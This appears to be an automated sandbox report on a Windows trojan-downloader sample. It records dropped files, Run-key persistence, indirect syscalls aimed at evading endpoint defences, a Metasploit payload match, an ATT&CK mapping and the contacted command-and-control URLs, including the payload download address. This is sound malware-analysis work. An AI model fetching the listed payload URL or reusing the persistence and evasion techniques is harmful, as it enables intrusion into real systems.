Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	Section loaded: webio.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: .xdata
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /4
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /19
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /31
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /45
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /57
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /70
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /81
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /97
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Static PE information: section name: /113
Source: sh-runner[1].exe.0.dr	Static PE information: section name: .xdata
Source: sh-runner.exe.0.dr	Static PE information: section name: .xdata

Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F88AF3 push 2F672291h; retf	2_3_000001FF24F88B32
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F82D0B push ds; ret	2_3_000001FF24F82D0E
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F751C3 push FF00009Eh; ret	2_3_000001FF24F751C8
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD6D253 push B7D19979h; retf	2_2_00007FF72BD6D259
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF22F9058E push ds; retf	2_2_000001FF22F90590
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF22F90804 push ecx; ret	2_2_000001FF22F90B32
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24F947C4 push FF00009Eh; ret	2_2_000001FF24F947C9
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA230C push ds; ret	2_2_000001FF24FA230F
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A2D0B push ds; ret	4_3_00000112CF6A2D0E
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6951C3 push FF00009Eh; ret	4_3_00000112CF6951C8
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A8AF3 push 2F672291h; retf	4_3_00000112CF6A8B32
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF4C058E push ds; retf	4_2_00000112CF4C0590
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF4C0804 push ecx; ret	4_2_00000112CF4C0B32
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C230C push ds; ret	4_2_00000112CF6C230F
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6B47C4 push FF00009Eh; ret	4_2_00000112CF6B47C9
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE552D0B push ds; ret	9_3_00000184BE552D0E
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE5451C3 push FF00009Eh; ret	9_3_00000184BE5451C8
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE558AF3 push 2F672291h; retf	9_3_00000184BE558B32
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE2A0804 push ecx; ret	9_2_00000184BE2A0B32
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE2A058E push ds; retf	9_2_00000184BE2A0590
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE57230C push ds; ret	9_2_00000184BE57230F
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE5647C4 push FF00009Eh; ret	9_2_00000184BE5647C9

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	File created: C:\ProgramData\sh-runner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

File created: C:\ProgramData\sh-runner.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgram			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgram			Jump to behavior

Source: C:\ProgramData\sh-runner.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\ProgramData\sh-runner.exe	Code function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,	2_2_000001FF24F97D70
Source: C:\ProgramData\sh-runner.exe	Code function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,	4_2_00000112CF6B7D70
Source: C:\ProgramData\sh-runner.exe	Code function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,	9_2_00000184BE567D70

Source: C:\ProgramData\sh-runner.exe

API coverage: 1.4 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD10EA0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,

2_2_00007FF72BD10EA0

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E52000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E0C000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_000001FF24F9D510 LdrGetProcedureAddress,

2_2_000001FF24F9D510

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD0C420 IsDebuggerPresent,

2_2_00007FF72BD0C420

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD1F1B0 GetProcessHeap,HeapAlloc,HeapAlloc,

2_2_00007FF72BD1F1B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 0_2_00007FF71C8C1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,	0_2_00007FF71C8C1180
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 0_2_00007FF71C8C8011 SetUnhandledExceptionFilter,	0_2_00007FF71C8C8011
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 0_2_00007FF71C8CE2C8 SetUnhandledExceptionFilter,	0_2_00007FF71C8CE2C8
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,	2_2_00007FF72BCD1180
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BDA5938 SetUnhandledExceptionFilter,Sleep,	2_2_00007FF72BDA5938

Source: C:\ProgramData\sh-runner.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\ProgramData\sh-runner.exe	NtCreateThreadEx: Indirect: 0x1FF24FA37EA	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtCreateThreadEx: Indirect: 0x112CF6C37EA	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtTerminateThread: Indirect: 0x184BE57490D	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueryInformationProcess: Indirect: 0x112CF6C3F7F	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtTerminateThread: Indirect: 0x1FF24FA490D	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueueApcThread: Indirect: 0x184BE5743A1	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueueApcThread: Indirect: 0x1FF24FA43A1	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueueApcThread: Indirect: 0x112CF6C43A1	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtTerminateThread: Indirect: 0x112CF6C490D	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtCreateThreadEx: Indirect: 0x184BE5737EA	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueryInformationProcess: Indirect: 0x184BE573F7F	Jump to behavior
Source: C:\ProgramData\sh-runner.exe	NtQueryInformationProcess: Indirect: 0x1FF24FA3F7F	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Process created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"

Jump to behavior

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD0B2C0 GetSystemTimePreciseAsFileTime,

2_2_00007FF72BD0B2C0

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_000001FF24F97D70 GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,

2_2_000001FF24F97D70

Source: C:\ProgramData\sh-runner.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match	File source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD22A06 bind,listen,WSAGetLastError,closesocket,		2_2_00007FF72BD22A06
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD22D7C bind,WSAGetLastError,closesocket,		2_2_00007FF72BD22D7C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	11 Process Injection	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	1 Account Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	3 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	39%	ReversingLabs
SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\sh-runner.exe	39%	ReversingLabs	Win64.Exploit.Marte
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe	39%	ReversingLabs	Win64.Exploit.Marte

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdatebg.s.llnwi.net	41.63.96.128	true	false		unknown

Contacted URLs

Name	Malicious	Reputation
https://84.201.150.223/	true	unknown
http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8	true	unknown
http://84.201.150.223/sh-runner.exe	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://84.201.150.223/E8	sh-runner.exe, 00000002.00000002.3055839319.000001FF24CE3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://84.201.150.223/sh-runner.exeSaving	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	false	unknown
https://84.201.150.223/-	sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/s	sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223:443/g	sh-runner.exe, 00000009.00000002.3055151540.00000184BE3BA000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/p	sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/q	sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/4	sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/u	sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/x	sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/y	sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/;~	sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223:443/v	sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/g(	sh-runner.exe, 00000002.00000003.2225218332.000001FF24CD1000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223:443/	sh-runner.exe, 00000004.00000002.3055154442.00000112CF630000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/?9	sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223//9	sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223:8443/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaC	sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	false	unknown
